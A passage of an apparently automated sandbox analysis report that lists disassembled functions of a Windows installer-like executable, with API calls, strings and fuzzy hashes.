                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID: hX
                                                                                            • API String ID: 730355536-463809249
                                                                                            • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                            • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                            • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                            Strings
                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                            • API String ID: 0-2329492092
                                                                                            • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                            • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                            • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                            • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                            • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                            APIs
                                                                                            • 752A1520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                            • 752A1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                            • 752A1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: A1500A1520A1540
                                                                                            • String ID: %E
                                                                                            • API String ID: 2563864905-175436132
                                                                                            • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                            • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectReleaseSelect
                                                                                            • String ID: %H
                                                                                            • API String ID: 1831053106-1959103961
                                                                                            • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                            • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                            • String ID: %H
                                                                                            • API String ID: 65125430-1959103961
                                                                                            • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                            • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                            • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                            Strings
                                                                                            • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                            • PendingFileRenameOperations, xrefs: 00455A40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                            • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                            • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                            • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                            • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                            • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                            • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421361
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                            • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                            • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2698912916-0
                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                            • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                            APIs
